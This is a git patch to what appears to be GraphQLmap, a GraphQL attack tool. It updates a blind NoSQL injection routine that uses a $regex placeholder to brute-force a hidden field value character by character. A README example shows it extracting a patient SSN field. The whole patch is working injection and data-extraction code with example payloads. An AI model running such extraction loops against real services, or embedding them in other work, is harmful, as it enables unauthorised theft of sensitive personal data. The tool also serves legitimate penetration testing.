From 6176bd3afc5cca548a9d0dce55a57d04b00be1e5 Mon Sep 17 00:00:00 2001
From: onSec-fr <infosec@antoine-lecoz.fr>
Date: Wed, 22 Apr 2020 11:32:48 +0200
Subject: [PATCH] Update attacks.py

#Change : blind_nosql
#Benefits : It can find the full value without knowing its length + Avoid infinite loops.
-Removed the "data_size" parameter. Now it stops searching as soon as it no longer finds valid characters.
-Add : Ability to set a custom charset.
---
 README.md  |  2 ++
 attacks.py | 22 +++++++++++++---------
 2 files changed, 15 insertions(+), 9 deletions(-)

diff --git a/README.md b/README.md
index 2942070..015e04d 100644
--- a/README.md
+++ b/README.md
@@ -134,7 +134,9 @@ Use `BLIND_PLACEHOLDER` inside the query for the `nosqli` function.
 GraphQLmap > nosqli
 Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
 Check > 5d089c51dcab2d0032fdd08d
+Charset > 0123456789abcdef-
 [+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b
+GraphQLmap >
 ```
 
 ### SQL injection 
diff --git a/attacks.py b/attacks.py
index d88a370..b3d80e2 100644
--- a/attacks.py
+++ b/attacks.py
@@ -159,24 +159,28 @@ def blind_mssql(url, method, headers):
 
 
 def blind_nosql(url, method, headers):
-    # Query : {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
-    # Check : "5d089c51dcab2d0032fdd08d"
-
+    # Query - include BLIND_PLACEHOLDER. e.g. {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
     query = input("Query > ")
+    # Check the input (known value) against the data found - e.g. 5d089c51dcab2d0032fdd08d
     check = input("Check > ")
+    # Charset to use - Default abcdefghijklmnopqrstuvwxyz1234567890
+    charset = input("Charset > ")
+    if(not charset):
+        charset = "abcdefghijklmnopqrstuvwxyz1234567890"
     data = ""
-    data_size = 35
-    charset = "0123456789abcdef-"
-
-    while len(data) != data_size:
+    _break = False
+    
+    while (_break == False):
+        old_data = data
         for c in charset:
             injected = query.replace("BLIND_PLACEHOLDER", data + c)
             r = requester(url, method, injected, headers)
             if check in r.text:
                 data += c
-
                 # display data and update the current line
                 print("\r\033[92m[+] Data found:\033[0m {}".format(data), end='', flush=False)
-
+        # Stop if no character is found
+        if(old_data == data):  
+            _break = True
     # force a line return to clear the screen after the data trick
     print("")